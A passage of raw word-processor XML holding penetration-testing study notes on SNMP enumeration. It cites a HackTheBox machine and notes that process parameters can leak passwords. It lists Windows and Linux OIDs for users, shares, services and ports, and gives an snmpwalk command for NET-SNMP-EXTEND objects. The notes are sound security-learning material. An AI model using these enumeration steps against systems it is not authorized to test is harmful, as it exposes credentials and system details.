          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (25:30 minute mark)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrSWRunParameters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">leaking user and password credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like if you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 login.py -u michael -p 123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u michael -p 123 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">will show up in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrSWRunParameters </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 login.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will show up in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrSWRunName </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D1">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0D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m6ifafi2voia" w:id="435"/>
      <w:bookmarkEnd w:id="435"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">= the raw numeric address of a value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MIB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = the library that tells you what the OID means, how to interpret it, and gives it a human-friendly name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1091">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://secybr.com/posts/snmp-pentesting-best-practicies/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard numeric OIDs (1.3.6.1.2.1…, 1.3.6.1.2.1.25…) are universal across OSes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only vendor/private OIDs (1.3.6.1.4.1.xxx) are tied to specific OSes or vendors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB (1.3.6.1.4.1.8072.1.3.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB is under the Net-SNMP private enterprise branch:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.6.1.4.1 → enterprise/private MIBs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8072 → the number IANA assigned to the Net-SNMP project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows INSTALLED SOFTWARE  1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows SYSTEM INFO     1.3.6.1.2.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows HOSTNAME        1.3.6.1.2.1.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows DOMAIN          1.3.6.1.4.1.77.1.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows UPTIME          1.3.6.1.2.1.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows USERS           1.3.6.1.4.1.77.1.2.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows SHARES          1.3.6.1.4.1.77.1.2.27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows DISKS           1.3.6.1.2.1.25.2.3.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows SERVICES        1.3.6.1.4.1.77.1.2.3.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   SYSTEM INFO     1.3.6.1.2.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   HOSTNAME        1.3.6.1.2.1.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   UPTIME          1.3.6.1.2.1.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   MOUNTPOINTS     1.3.6.1.2.1.25.2.3.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   RUNNING SOFTWARE PATHS  1.3.6.1.2.1.25.4.2.1.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux   LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5229225" cy="2609850"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="515" name="image497.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image497.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1092"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5229225" cy="2609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0F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8q2pb6baqmty" w:id="436"/>
      <w:bookmarkEnd w:id="436"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most helpful SNMP commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v 1 -c public 192.168.220.149 NET-SNMP-EXTEND-MIB::nsExtendObjects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
